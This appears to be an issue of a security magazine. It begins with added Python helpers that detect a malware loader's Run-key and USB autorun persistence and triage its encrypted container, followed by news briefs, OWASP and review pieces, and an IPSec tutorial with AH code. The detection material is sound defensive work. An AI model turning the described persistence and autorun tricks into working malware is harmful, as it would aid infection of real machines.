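The registry and USB artifacts described above for the Persistence and USB threads, checked against collected data. This is an added example written for this article, not the author's or the malware's code; it assumes the Run key's values and a removable drive's root listing have already been collected into plain dicts, and the sample dicts below are constructed. It also accepts autorun.inf, which the article does not mention, since that is the file name Windows itself honours.

```python
"""Host-artifact checks for the Kazy loader's persistence and USB behaviour (added example)."""
import re

# Artifacts reported in the analysis: a Run value named "Upadate" whose data is
# ApplicationData + "\Adobe" + <number between 9 and 999> + ".exe", and, on removable
# drives, a copy named rundll32.exe beside an autorun file that launches it.
RUN_VALUE_NAME = "Upadate"
# The article describes a plain string concatenation, so no separator is expected
# between "Adobe" and the number; an optional backslash is tolerated (assumption).
DROP_PATH = re.compile(r"[\\/]Adobe[\\/]?(\d{1,3})\.exe\s*$", re.IGNORECASE)
AUTORUN_LINE = re.compile(r"^\s*shellexecute\s*=\s*rundll32\.exe\s*$",
                          re.IGNORECASE | re.MULTILINE)


def check_run_values(run_values: dict) -> list:
    """run_values maps value name -> data for HKCU\\...\\CurrentVersion\\Run."""
    findings = []
    for name, data in run_values.items():
        reasons = []
        target = data.strip().strip('"')
        m = DROP_PATH.search(target)
        if m and 9 <= int(m.group(1)) <= 999:
            reasons.append("path matches the ApplicationData\\Adobe<n>.exe drop location")
        if name == RUN_VALUE_NAME:
            reasons.append("value name matches the loader's 'Upadate' entry")
        if reasons:
            findings.append({"value": name, "data": data, "reasons": reasons})
    return findings


def check_removable_root(listing: dict) -> list:
    """listing maps file name -> content (bytes or str) for one drive's root directory."""
    names = {n.lower(): n for n in listing}
    reasons = []
    if "rundll32.exe" in names:
        reasons.append("rundll32.exe in a removable drive root (never a legitimate location)")
    autorun = names.get("autorun.ini") or names.get("autorun.inf")  # .inf added here
    if autorun:
        content = listing[autorun]
        if isinstance(content, bytes):
            content = content.decode("ascii", errors="replace")
        if "[autorun]" in content.lower() and AUTORUN_LINE.search(content):
            reasons.append(f"{autorun} launches rundll32.exe from the drive root")
    return reasons


# Constructed snapshots standing in for collected data (hypothetical user "alice").
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Upadate": r"C:\Users\alice\AppData\Roaming\Adobe412.exe",
}
SAMPLE_USB_ROOT = {
    "rundll32.exe": b"MZ...placeholder executable body...",
    "autorun.ini": b"[autorun]\r\nshellexecute=rundll32.exe",
    "photos": b"",
}

if __name__ == "__main__":
    for hit in check_run_values(SAMPLE_RUN_VALUES):
        print("Run value", hit["value"], "->", "; ".join(hit["reasons"]))
    for reason in check_removable_root(SAMPLE_USB_ROOT):
        print("Removable drive:", reason)
```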

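A static triage helper for the Loader thread's container format described above, written as an added example for this article (it is not the author's code and not taken from the sample): it splits a file on the published delimiter, enforces the 14-element layout, pulls out the key, the host-process name and the Base64 payload, and reports the payload's entropy. The PolyDecrypt routine is not described on the page, so the helper stops at the still-encrypted bytes; the blob it runs on is constructed inline, and its field contents are placeholders apart from the two values quoted in the article.

```python
"""Static triage of the Kazy loader's delimiter-split container (added example)."""
import base64
import binascii
import math

# Values reported in the analysis above.
DELIMITER = b"VfBOBnPkjMHYKOnOZT"   # ASCII delimiter the loader splits on
EXPECTED_FIELDS = 14                 # the split yields a 14-element array
KEY_INDEX = 1                        # 2nd element: PolyDecrypt key
PROCESS_INDEX = 5                    # 6th element: process to start suspended
PAYLOAD_INDEX = 12                   # 13th element: Base64 of the encrypted backdoor


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; close to 8.0 means compressed or encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts if c)


def split_container(blob: bytes) -> list:
    """Split exactly as the loader does and enforce the expected layout."""
    parts = blob.split(DELIMITER)
    if len(parts) != EXPECTED_FIELDS:
        raise ValueError(
            f"expected {EXPECTED_FIELDS} fields, got {len(parts)}: "
            "not this loader variant, or the delimiter changed")
    return parts


def triage(blob: bytes) -> dict:
    """Extract the interesting fields without executing anything."""
    parts = split_container(blob)
    key = parts[KEY_INDEX].decode("ascii", errors="replace")
    process = parts[PROCESS_INDEX].decode("ascii", errors="replace").strip()
    try:
        encrypted = base64.b64decode(parts[PAYLOAD_INDEX].strip(), validate=True)
    except binascii.Error as exc:
        # Layout matched but the payload field is not clean Base64.
        return {"key": key, "process": process, "payload_error": str(exc)}
    return {
        "key": key,
        "process": process,
        "payload_len": len(encrypted),
        "payload_entropy": round(shannon_entropy(encrypted), 3),
        # Still PolyDecrypt-encrypted: the next step is dynamic analysis of the loader.
        "payload": encrypted,
    }


def build_sample() -> bytes:
    """Constructed stand-in for a sample; every field is a placeholder except the two
    values quoted in the article."""
    fake_payload = bytes((i * 73 + 41) % 256 for i in range(512))  # uniform byte mix
    fields = [b"MZ...placeholder executable body..."] + [b""] * (EXPECTED_FIELDS - 1)
    fields[KEY_INDEX] = b"ksGhCgFWiXUOgdzjuBwIZavw"   # key quoted in the article
    fields[PROCESS_INDEX] = b"vbc.exe"                # process named in the article
    fields[PAYLOAD_INDEX] = base64.b64encode(fake_payload)
    for i in (2, 3, 4, 6, 7, 8, 9, 10, 11, 13):
        fields[i] = b"field%d" % i
    return DELIMITER.join(fields)


if __name__ == "__main__":
    report = triage(build_sample())
    print({k: v for k, v in report.items() if k != "payload"})
```

A high payload entropy with a valid 14-field split is the cue that the file is this loader variant and that what follows needs the decryption routine, not more string carving.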


Prepared by Ahmed Mashally


News Reporter


NSA and British Agency are Spying on You via the Angry Birds Game App

A Peek Under The Hood To The Recent Security Breaches

Smartphone applications such as Google Maps, Facebook, Twitter, Flickr and games like Angry Birds are among the biggest sources of information for the NSA. Intelligence agencies use these apps to track locations, access address books, buddy lists and phone logs, and collect personal data such as age, gender and other personal details, according to the latest documents leaked by Edward Snowden.


Foursquare vulnerability leaks 45 million users’ email addresses

According to penetration tester Jamal Eddine, an attacker could extract the email addresses of all 45 million users with just a few lines of script. In July 2013 a similar vulnerability was reported on Facebook (disclosing the primary email address).

Millions of Germans’ emails have been hacked

The country’s Federal Office for Online Security (BSI) said that 16 million accounts had been compromised. The BSI refused to give details on the source of the information, and advised victims to digitally clean their computer and change access to their online profiles.

Bluetooth Skimmers lead to $2 Million theft at gas stations

A group of hackers stole banking information using Bluetooth-enabled credit card skimmers planted at gas stations throughout the Southern United States, and made more than $2 million by downloading the ATM information as well as PIN numbers.


Syrian Electronic Army’s official website hacked by Turkish Hackers

A group of Turkish hackers (@Turkguvenligi on Twitter) hacked and defaced the official website of the pro-Bashar Assad Syrian Electronic Army. The hacked link belongs to the leak section, which is used by the SEA to publish sensitive data. The SEA has confirmed that their site was targeted but that the home page was not affected.

‘Java Bot’: A cross-platform malware running on Windows, Mac and Linux

Security researchers at Kaspersky discovered a cross-platform malware that runs on Windows, Mac and Linux. The malware is written entirely in Java; once the bot infects a system, it copies itself into the user’s home directory and adds itself to the auto-start programs. This bot has appeared as one of the sources of DDoS attacks.

OpIsraelBirthday will be a Massive Cyber Attack against Israel on 7 April 2014

The online hacktivist group AnonGhost, along with other hackers, decided to attack Israeli cyberspace on the 7th of April, when the country celebrates its birthday. The attack will be conducted under the banner of #OpIsraelBirthday, in which every possible Israeli website will be a target, to show their solidarity with Palestine.


Microsoft employees’ emails hacked by Syrian Electronic Army

Microsoft has confirmed that, in addition to its official Twitter account, email accounts of its employees were also compromised by the SEA. A Microsoft spokesperson said: “A social engineering method known as phishing resulted in a small number of Microsoft employee social media and email accounts being impacted. Accounts were reset and no customer information was compromised.”

Egyptian penetration tester discovers PHP code injection vulnerability in Yahoo

Ebrahim Hegazy (a web application penetration tester) discovered a critical remote PHP code injection vulnerability in the Yahoo website that could allow hackers to inject and execute arbitrary PHP code on the Yahoo server. Yahoo fixed the issue immediately after being notified by the researcher.

Google announces more than two million dollars in rewards for hacking Chrome OS

Google has announced the Pwnium hacking contest for hacking Chrome OS. The event will be held at the Canadian security conference CanSecWest (Vancouver, 2014) on March 12. The firm will shell out a massive $2.7 million in total rewards to individual and team winners, but the contest is unfortunately not open to residents of Italy, Brazil, Quebec, Cuba, Iran, Syria, North Korea and Sudan.


OWASP Cairo Chapter Leader


OWASP’s Mission and Core Values

OWASP’s mission is to make software security visible, so that individuals and organizations worldwide can protect themselves and make informed decisions about software security risks. Since its creation, OWASP has always followed and supported four main values:

1. OPEN: Everything at OWASP is totally transparent from finances to code.

2. INNOVATION: OWASP encourages and supports innovation/experiments for solutions to software security challenges.

3. GLOBAL: Anyone around the world is encouraged to participate in the OWASP community.

4. INTEGRITY: OWASP is an honest and truthful, neutral, global community.

What is OWASP?

The Open Web Application Security Project (OWASP) is a worldwide non-profit charitable organization focused on improving the security of software. The OWASP community includes corporations, educational organizations, and individuals from all over the world. These communities work to create articles, methodologies, documentation, tools, and technologies and make them freely available to everyone to use and benefit from. OWASP does not endorse or recommend commercial products or services, allowing the OWASP community to remain vendor-neutral with the collective wisdom of the best minds in software security worldwide. All OWASP expenses are covered by conferences, memberships, corporate sponsors and banner advertisements.


OWASP Project Inventory

OWASP’s projects cover many aspects of application and software security. The main purpose of the projects is to create documents, tools, teaching environments, guidelines, checklists, and other materials to help organizations improve their capabilities to produce secure code. OWASP currently has over 142 active projects, and new project applications are submitted every week.

All OWASP tools, documents, and code library projects are organized into the following categories:

• Incubator Projects: the experimental playground where projects are still being fleshed out, ideas are still being proven, and development is still underway.

• Lab Projects: they produce OWASP-reviewed deliverable prototypes that are not yet production-ready.

• Flagship Projects: The OWASP Flagship designation is given to projects that have demonstrated superior maturity, established quality, and strategic value to OWASP and application security as a whole.

OWASP Top Ten

One of the main Flagship projects owned by OWASP is the Top Ten project. The project’s main purpose is to present a list of the most critical web application security flaws and their possible solutions. The project provides powerful awareness documentation for web application security. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. The 2013 Top Ten is available in Arabic in addition to many other languages.

How to participate

Are you an application developer? Are you a security researcher? Do you have an idea but just need contributors to make it reach the real world? Everyone is free to participate in OWASP and all of the materials are available under a free and open software license. OWASP’s global group of volunteers numbers over 36,000 participants. If you want to be part of the OWASP community, you have the following three options:

• Join a project: this is the most popular division of OWASP, as it gives members an opportunity to freely test theories and ideas with the professional advice and support of the OWASP community. Everyone is welcome to contribute to any of OWASP’s open projects.

• Edit a page: OWASP is a wiki; there are thousands of active wiki users around the globe who review the changes to ensure quality. If you see a page that needs some clarification or better information, you are welcome to edit it.

• Global Initiatives: the OWASP Global Initiatives program was established to provide easy access for volunteers interested in contributing to OWASP. There are a variety of items that need volunteers.

OWASP Egypt Chapter

To be part of these worldwide active projects and to transfer all this knowledge and experience to the Egyptian application security industry, the Egyptian chapter of OWASP is here as the starting point for all Egyptian contributors to take part in OWASP projects and to benefit from local and international expertise in this field.

Attending our chapter meetings is FREE and OPEN to anyone; OWASP membership is NOT required. The Egyptian chapter will hold bi-monthly meetings, so simply sign up on the mailing list, watch for the next meeting, stop by to introduce yourself, ask questions and collaborate. The Egyptian chapter’s opening meeting will be held at ITI in April. New ideas will be discussed and groups will be created to work on actual projects. Apart from the regular meetings, educational workshops will be held to bring real benefit to all contributors.


Senior Application Security and Data Protection Consultant


Book Review

Mobile Application Security

Mobile Application Security is a highly technical book. The authors are three mobile security veterans from iSEC Partners, a reputable mobile security services company with several mobile 0-days and Black Hat talks to its name. They focus on the mobile threat landscape from a developer’s perspective, shedding light on mobile development security concepts and secure coding tips that most developers overlook. The book is split into two main parts: one describes the security architecture of the different mobile platforms and how it can be used to develop secure mobile applications, and the other illustrates some of the common mobile services, their attack vectors, the history of attacks against them, and the lessons learned from those attacks.


The first part starts by enumerating some of the top generic mobile security issues and their solutions, such as application isolation issues, transport layer security issues, physical security issues and privacy issues. Then the authors dive into the details of the platform-specific security architectures and features. Starting with Android, then iPhone, Windows Mobile, BlackBerry, J2ME, Symbian, and ending with WebOS, they offer a comprehensive overview of the core security components and the security features of the OS components, detailing how they work and how a developer can use them. Components described include inter-process communication mechanisms, background services, storage access, notifications, application permissions, clipboard access, sockets, web networking, application updating, signing and packaging. At the end of some chapters, a bullet-style conclusion provides the reader with actionable development tips for a specific platform, which I find very useful and which would make a great security coding checklist for developers.

In the second part, the authors explore some common services, introduced by the prevalence of mobiles, that need special care from a security and privacy point of view. The services described include SMS, Bluetooth and geolocation services. In addition, the authors dedicate a chapter to enterprise mobile security concepts and practices for building secure enterprise-enabled mobile applications.

At the end of the book, the appendices provide excellent tangents: one appendix on the anatomy of major mobile malware outbreaks and the other detailing tools that can be used in mobile security testing, static and dynamic analysis, fuzzing, and network manipulation.

As expected from a developer-oriented book, it is coherently written in a formal scientific style that is sometimes mixed with technical whimsy. The language is very clear and unambiguous. Very often code snippets and detailed command-line steps are included to show the secure way of developing a certain feature or using some tool. Also, having vast knowledge of the community-driven tools available, the authors provide instructions and links to related tools on many occasions, which I find to be a big advantage since quality tools in this area are scarce and hard to find.

On the downside, although the book covers Android, BlackBerry, iOS and Windows Mobile application security practices very thoroughly, the 2010 publishing date means that it misses some of the most recent changes in the covered platforms. For example, the book was published before BlackBerry 10 and Windows Phone 8 were released, so it does not include information on them. Also, major security enhancements were added in iOS 7 and Android 4.4, which were also released after the publishing date. However, the book offers a solid understanding of concepts and practices that, with adequate research, could be extrapolated and applied to more modern versions. Additionally, the book lacks differential analysis: there is no comparative tone through most parts, so it is left to the reader to identify the differences between the security implementations and features of the discussed platforms.

Overall, I think it is a very good read. The guidance in this book has helped me better shape a unified methodology for mobile application security assessment and penetration testing. I strongly recommend it for developers of security-critical mobile applications and for mobile application penetration testers.

Bluekaizen has an active online community on Facebook; check us out at Facebook.com/bluekaizen.original


IDC CIO Summit 2014

CIO in the new business world of tech+transformation

Event Review

On 24th and 25th February, the Jumeirah Beach Hotel in Dubai hosted the annual Middle East CIO Summit event by IDC.

The CIO Summit is an annual event targeting CIOs from different countries in the Middle East, different sectors and different cultures, for one purpose: to present the latest technologies and provide them with updated strategies to meet the challenges of today’s developments.

This year’s event was more special than in previous years: the number of sponsors and exhibitors doubled, with CIO Summit 2014 showing more than 30 exhibitors and sponsors. Furthermore, the number of attendees increased to nearly 250-300 CIOs from the UAE, Oman, Qatar, Bahrain and other countries. In CIO Summit 2014 IDC introduced a new term, the Third Platform; most sessions focused on presenting this new concept to attendees. According to IDC, the Third Platform is the near future of IT, where companies are moving to four main technologies (cloud, mobility, big data, and social business). The picture below describes it in more detail, and it appeared in nearly all the speakers’ slides.


The two-day conference started with a keynote from H.E. Sheikh Nahyan Mabarak Al Nahyan, Minister of Culture and Youth, UAE.

The event topic mainly revolved around the idea of tech and transformation and how CIOs can deal with the inevitable change. “Change before you have to,” noted Sa’di Awienat, CTO and GS Leader Gulf, EMC.

In his session “The time to redefine IT is now!” he showed that the problem is mainly that companies take IT innovation for granted, and that companies do not have enough resources when it comes to security, especially staffing, emphasising that in the upcoming years specialisation in security will be highly needed and that a good candidate will have to be technically focused as well as business focused.

The rest of the sessions were presented in the main conference room, with a variety of speakers talking about interesting topics. To name a few of the sessions:

• Transformation 2020, presented by Crawford Del Prete, EVP, IDC
• Digital Revolution, presented by Abdullah Hashim, SVP, Etisalat

Then the sessions were divided into three break-out sessions, each on a different topic; we made sure to attend the one about security, called “Envisioning a new approach to information security”. The session featured a panel discussion moderated by IDC, with the following participants:

• Bill Hau, Vice President, FireEye
• Nader Henein, Regional Director, Product Security, BlackBerry
• Mohamed Amin, Senior Security Researcher, Kaspersky Labs
• Mukund Seetharaman, General Manager, Wipro

This was followed by a presentation from Shaimaa Almarzouqi from GASCO about the risk of social media and the risk of unlimited exposure online.

Also, Security Kaizen magazine interviewed InfoWatch, a company specialized in DLP (data leakage prevention). You can watch the full interview on our website here: http://www.bluekaizen.org/interview-with-andrey-sokurenko-business-development-director-info-watch/

We also had another interview with Ahmad Mokhtar from Vision Solutions, where we talked about their products and especially Double-Take. You can watch the full interview here: http://www.bluekaizen.org/interview-with-ahmed-mokhtar-vice-president-of-sales-growth-market-vision-solutions/

Nader Henein, security advisor at BlackBerry, was there and we had a nice chat about BlackBerry security and how different governments had concerns about deploying BlackBerry solutions. You can watch the full interview here: http://www.bluekaizen.org/interview-with-nader-hanein/

Overall, the event was a good opportunity for both CIOs and vendors: for one side to learn about the latest products in the market and for the other to present their products and solutions.

Finally, one piece of advice given to attendees as best practice is to always go back to basics when it comes to security.

“You can spend lots of money but without the right policy you have no security,” stated Sudhir Menon, Senior Manager Security Services, Etisalat.


Network Engineer at AlexFert


Course Review

Master of Security Science (MSS)

By EC-Council University

It is the first information security program provided 100% online. It aims to prepare well-educated professionals in information security and assurance. I was in the first group that enrolled in this program from Egypt. EC-Council and New Horizons Training Center launched this program in Alexandria in 2009 and facilitated all the enrollment procedures for selected network professionals in Alexandria. The admission requirements were very strict at that time:

• Bachelor’s degree from an accredited institution in computer science or a related field is a must
• TOEFL for non-English speakers with a minimum score of 550
• At least 2 years’ experience in the IT field
• Two letters of recommendation
• Personal statement
• Copy of the undergraduate transcript in English and passport
• 100 USD application fee

These requirements have been modified recently, so please refer to their website for the latest admission details. [1]


The Master of Security Science program solidifies an excellent mix of executive leadership and tactical information security skills by educating individuals in industry-leading technologies, executive leadership, psychology, management, law and ethics. Focusing on topics like “the hacker’s mind”, “ethical hacking” and even “global leadership” provides a very unique skill set, arming the graduate with the tools, knowledge and ability to lead effectively against advanced persistent threats such as individually motivated hacktivists, state-sponsored organizations and even organized crime exploiting digital technologies.

Course Structure

36 credit hours are required to earn the degree. The courses are divided into two categories (core and electives). It is mandatory to take 6 core courses in information security (18 credit hours) and then select 6 courses including a capstone project (18 credit hours). There is good news for certified CEHs and holders of other EC-Council certifications, including CHFI and ECSA/LPT: you can transfer these certifications into credit hours and skip their related courses.

                          No. of Courses   Total Credits Earned
Core (3 cr each)                6                  18
Elective (3 cr each)            5                  15
Capstone Project (3 cr)         1                   3
Total                          12                  36

Mode of Study

MSS is 100% online study, allowing you to complete course work in a flexible time frame that fits your own schedule. You need a computer and internet connectivity to participate in class activities. Each course runs for ten weeks and is worth 3 credits. Each course amounts to approximately 135 hours of work (reading, online discussion forum postings, assignments, papers, and supplementary requirements). You will have a mix of these assignments each week and submit all the requirements through the Learning Management System (LMS) portal before the weekly deadline. Time and stress management are required to complete the necessary course work. You can enroll in a maximum of two courses each term, and you have to carefully balance work, study and personal commitments. The core courses are heavy and consist of projects and many requirements that must be fulfilled.

The minimum grade to pass a course is C (70%), and you have to maintain a cumulative GPA of 3.0/4.0 to continue the program and earn the degree. Instructors are very friendly and helpful. They provide guidance and assistance during the course and evaluate you weekly on each assignment. EC-Council University has a strict Academic Honesty Policy against cheating, plagiarism, fabrication and unauthorized collaboration between students. They have software that detects copy-and-paste, paragraph and percentage matching against any other document within their portal, so don’t try this technique; use your own words.


My Personal Experience

I started this program in 2009 in Alexandria, Egypt. We were 10 students, the first group from Egypt enrolled in EC-Council University. The course structure and credit hours were different (42 instead of the 36 now). Tuition was much less than now and the portal was very poor. During my study from 2009 till 2013 they made a lot of changes to the program, making it more attractive, including trying to obtain DETC accreditation. Some of the recent changes include access to virtual labs for hands-on exercises, proctored exams, courses that are now 10 weeks instead of 8, two different sub-specializations (management and information assurance), video-streamed lectures (work in progress), more payment methods and an updated LMS, among others. They now also offer a special course in Cloud Computing. The thing that attracted me most about the program was the diversity of security-related courses, from general security to Wireless Hacking, Ethical Hacking, Forensics, Disaster Recovery, Business Continuity, Pentesting, Secure Programming, Securing Linux, Leadership, Project Management and others. I didn’t seek the Master’s degree as much as I was seeking diversified knowledge in information security. The MSS program provides you with wide and in-depth knowledge in various information security domains. You can easily become CISSP certified after finishing this program. The Capstone project is the final step before graduation. It is an intense course that covers all the areas studied in the program. After successfully completing the Capstone, you have to pay $300 to receive your graduation certificates and 3 copies of the official transcript by courier.

Books and Materials

EC-Council University does not supply books, tools, electronic equipment or electronic supplies for each term of instruction. Although you have to pay for access to an online library provided by EC-Council University, additional book purchases may be required for certain courses. Some of these books are not easy to get because of cost and shipping problems. Some of them can be found online as soft copies, but through illegal channels. Other books are available in public libraries. I noticed six courses that have this issue, so check the availability of the books before selecting these courses. The online library services of Books 24/7 or academica.com are useful and consist of rich materials. Most of the courses are delivered with educational slides that fully cover the objectives of the course.

Program Cost

The MSS from EC-Council is an expensive degree. You will pay a total of $17,500 during your study period, but wait, this is just the official cost. Registration, application, library and technology fees of $675 are paid once at the beginning. Another $300 is paid at graduation time. Students pay tuition on a course-by-course basis at the registration period before the start of the term. The maximum expected completion time of the program is four years. Payment can be made using PayPal, credit card or wire transfer. Officially, tuition per credit hour is $450, but they offer a discount of up to 50%, which reduces the total cost to about $9,500. EC-Council offers this discount based on geographic location and international currency values. You have to determine your budget before starting this program because you will pay around $2,400 per annum for 4 years. Still expensive?

Accreditation

EC-Council University is an applicant for DETC [2] accreditation. It is expected to complete all the DETC processes by 2014. You have to consider that the MSS is a professional Master’s, not an academic one, because it is not accredited yet. Students considering continuing their education or transferring to another institution must not assume that credits or degrees earned at EC-Council University will be accepted by the receiving institution.


About EC-Council UniversityEC-Council University is a leading provider of information security education and training to professionals in the security and military fields, and post-graduate students. It is the developer of the ‘Master of Security Science,’ a 100 percent online degree program designed to provide students with a solid foundation in information security. The MS information security course is suitable for students with a wide range of previous security experience. The MSS program is offered online, enabling students to access classes from any location in the world and at any time. The University also offers several certifications, including Information Security Professional, IT Analyst, Digital Forensics and Executive Information Assurance, IT Disaster Recovery Certifications, Digital Forensics and Executive Information.

References:
[1] https://www.eccuni.us/Portals/0/Doc/EC-Council-University-Prospectus-brochure-2013.pdf
[2] http://www.detc.org/

The reality is that academic degrees don't carry much weight in the information security business. For instance, CISSP and other certifications are more widely accepted than academic degrees from a reputable university. No doubt EC-Council is well known in the certification market, but you will not find a program similar to the MSS. This program gives you the opportunity to obtain a professional and academic degree, once the program receives accreditation. MSS is expensive compared to any other certificate. EC-Council certainly markets itself aggressively in the IT security space. That, along with the overseas stamp of earning an American University degree, might help explain how it sells its high-priced unaccredited degrees. It might be legitimate and valuable if it became widely known and accredited.

Master of Security Science SWOT Analysis


Best Practice

Encrypting Windows Traffic Using IPSec

Using IPSec

By its design, TCP/IP is an open protocol created to connect heterogeneous computing environments with the least amount of overhead possible. As is often the case, interoperability and performance design goals do not generally result in security, and TCP/IP is no exception to this. TCP/IP provides no native mechanism for the confidentiality or integrity of packets. To secure TCP/IP, you can implement IP Security. IPSec implements encryption and authenticity at a lower level in the TCP/IP stack than application-layer protocols such as Secure Sockets Layer (SSL) and Transport Layer Security (TLS). Because the protection process takes place lower in the TCP/IP stack, IPSec protection is transparent to applications. IPSec is a well-defined, standards-driven technology.

Dear Security Kaizen magazine readers, as part of the Defense-in-Depth strategy, I chose to introduce the topic in this issue to you by taking an excerpt from one of my favorite references in my library: "Microsoft Windows Security Resource Kit", Ben Smith and Brian Komar with Microsoft Security Team, Microsoft Press 2003, ISBN 0-7356-1868-2.

Chief Technology Officer, Andromeda Labs


The IPSec process encrypts the payload after it leaves the application at the client and then decrypts the payload before it reaches the application at the server. An application does not have to be IPSec aware, because the data transferred between the client and the server is handed to IPSec in plaintext. IPSec is comprised of two protocols that operate in two modes with three different authentication methods. IPSec is policy driven and can be deployed centrally by using Group Policy. To deploy IPSec, you must determine the:

• Protocol

• Mode

• Authentication methods

• Policies

Securing Data Transmission with IPSec Protocols

As mentioned, IPSec is comprised of two protocols: IPSec Authentication Header (AH) and IPSec Encapsulating Security Payload (ESP). Each protocol provides different services; AH primarily provides packet integrity services, while ESP provides packet confidentiality services. IPSec provides mutual authentication services between clients and hosts, regardless of whether AH or ESP is being used.

Using AH

IPSec AH provides authentication, integrity, and anti-replay protection for the entire packet, including the IP header and the payload. AH does not provide confidentiality. When packets are secured with AH, the IPSec driver computes an Integrity Check Value (ICV) after the packet has been constructed but before it is sent. With Microsoft Windows XP or later, you can use either the HMAC SHA1 or HMAC MD5 algorithm to compute the ICV. Figure 9-3 shows how AH modifies an IP packet.

Figure 9-3. AH modifications to an IP packet

The fields in an AH packet include the following:

• Next Header Indicates the protocol ID for the header that follows the AH header. For example, if the protected data is transmitted using TCP, the next header value would be 6, which is the protocol ID for TCP.

• Length Contains the total length of the AH.

• Security Parameters Index (SPI) Identifies the security association (the IPSec agreement between two computers) that was negotiated in the Internet Key Exchange (IKE) protocol exchange between the source computer and the destination computer.

• Sequence Number Protects the AH-protected packet from replay attacks in which an attacker attempts to resend a packet that he has previously intercepted, such as an authentication packet, to another computer. For each packet issued for a specific security association (SA), the sequence number is incremented by 1 to ensure that each packet is assigned a unique sequence number. The recipient computer verifies each packet to ensure that a sequence number has not been reused. The sequence number prevents an attacker from capturing packets, modifying them, and then retransmitting them later.

• Authentication Data Contains the ICV created against the signed portion of the AH packet by using either HMAC SHA1 or HMAC MD5. The recipient performs the same integrity algorithm and compares the result of the hash algorithm with the result stored within the Authentication Data field to ensure that the signed portion of the AH packet has not been altered in transit. Because the TTL, Type of Service (TOS), Flags, Fragment Offset, and Header Checksum fields are not used in the ICV, packets secured with IPSec AH can cross routers, which can change these fields.
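The two AH properties described above, the ICV that skips the mutable IP header fields and the per-SA sequence number check, are easy to see in code. The following is an added example written for this article, not code from the Resource Kit or from Windows; the packet layouts, the HMAC key, the addresses and the TCP payload are all constructed here, and the ICV is HMAC-SHA1 truncated to 96 bits as the IPSec AH profile of HMAC-SHA1 specifies. The anti-replay check uses a sliding bitmap window, which is how real implementations allow reordering while still dropping a reused sequence number.

```python
"""IPSec AH in transport mode: ICV scope and the anti-replay check.
Added example, not from the article or the Resource Kit. Layouts, key,
addresses and payload are constructed; ICV is HMAC-SHA1-96."""
import hashlib
import hmac
import struct

AH_PROTO = 51      # IP protocol number carried in the IP header for AH
TCP_PROTO = 6      # AH Next Header value when the payload is a TCP segment
ICV_LEN = 12       # 96-bit truncated HMAC-SHA1 ICV

def build_ipv4_header(src, dst, proto, total_len, ttl=64, tos=0):
    """Minimal 20-byte IPv4 header (no options); checksum left at zero."""
    ver_ihl = (4 << 4) | 5
    return struct.pack("!BBHHHBBH4s4s", ver_ihl, tos, total_len, 0x1234,
                       0, ttl, proto, 0, src, dst)

def zero_mutable_fields(ip_hdr):
    """Fields a router may rewrite (TOS, Flags/Fragment Offset, TTL, Header
    Checksum) are treated as zero when the ICV is computed."""
    h = bytearray(ip_hdr)
    h[1] = 0                  # Type of Service
    h[6:8] = b"\x00\x00"      # Flags + Fragment Offset
    h[8] = 0                  # TTL
    h[10:12] = b"\x00\x00"    # Header Checksum
    return bytes(h)

def build_ah_header(spi, seq, next_header, icv=b"\x00" * ICV_LEN):
    """Next Header, Payload Len, Reserved, SPI, Sequence Number, ICV.
    Payload Len is the AH length in 32-bit words minus 2: 24/4 - 2 = 4."""
    payload_len = (12 + ICV_LEN) // 4 - 2
    return struct.pack("!BBHII", next_header, payload_len, 0, spi, seq) + icv

def compute_icv(key, ip_hdr, ah_hdr, payload):
    """ICV over the IP header (mutable fields zeroed), the AH header with
    its Authentication Data zeroed, and the upper-layer payload."""
    ah_zeroed = ah_hdr[:12] + b"\x00" * ICV_LEN
    data = zero_mutable_fields(ip_hdr) + ah_zeroed + payload
    return hmac.new(key, data, hashlib.sha1).digest()[:ICV_LEN]

def ah_protect(key, src, dst, spi, seq, tcp_segment):
    """Sender side: wrap a TCP segment in IP + AH and fill in the ICV."""
    total_len = 20 + 12 + ICV_LEN + len(tcp_segment)
    ip_hdr = build_ipv4_header(src, dst, AH_PROTO, total_len)
    ah_hdr = build_ah_header(spi, seq, TCP_PROTO)
    icv = compute_icv(key, ip_hdr, ah_hdr, tcp_segment)
    return ip_hdr + ah_hdr[:12] + icv + tcp_segment

def parse_ah(packet):
    """Receiver side: split IP header, AH header and payload."""
    ip_hdr = packet[:20]
    nh, plen, _, spi, seq = struct.unpack("!BBHII", packet[20:32])
    ah_len = (plen + 2) * 4
    ah_hdr = packet[20:20 + ah_len]
    return {"ip": ip_hdr, "ah": ah_hdr, "next_header": nh, "spi": spi,
            "seq": seq, "icv": ah_hdr[12:ah_len], "payload": packet[20 + ah_len:]}

class AntiReplayWindow:
    """Per-SA sequence-number tracking: a sliding bitmap so that packets
    that arrive out of order but were never seen are accepted, while a
    reused sequence number is dropped."""
    def __init__(self, size=64):
        self.size, self.highest, self.bitmap = size, 0, 0

    def check_and_update(self, seq):
        if seq == 0:
            return False                      # sequence numbers start at 1
        if seq > self.highest:                # window slides forward
            shift = seq - self.highest
            self.bitmap = ((self.bitmap << shift) & ((1 << self.size) - 1)) | 1
            self.highest = seq
            return True
        if self.highest - seq >= self.size:
            return False                      # older than the window
        bit = 1 << (self.highest - seq)
        if self.bitmap & bit:
            return False                      # already received: replay
        self.bitmap |= bit
        return True

def ah_verify(key, packet, window):
    """Returns 'ok', 'bad-icv' or 'replay' for an incoming AH packet."""
    p = parse_ah(packet)
    expected = compute_icv(key, p["ip"], p["ah"], p["payload"])
    if not hmac.compare_digest(expected, p["icv"]):
        return "bad-icv"
    if not window.check_and_update(p["seq"]):
        return "replay"
    return "ok"
```

Decrementing the TTL of a protected packet (what every router on the path does) leaves `ah_verify` returning "ok", while flipping a payload byte returns "bad-icv", and feeding the same packet to the same window twice returns "replay" the second time.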


Using ESP

ESP packets are used to provide encryption services to transmitted data. In addition, ESP provides authentication, integrity, and antireplay services. When packets are sent using ESP, the payload of the packet is encrypted and authenticated. In Windows XP or later, the encryption is done with either Data Encryption Standard (DES) or 3DES, and the ICV calculation is done with either HMAC SHA1 or HMAC MD5.

ESP encrypts the TCP or UDP header and the application data included within an IP packet. It does not include the original IP header unless IPSec tunnel mode is used. Figure 9-4 shows how ESP modifies an IP packet.

Figure 9-4. ESP modifications to an IP packet

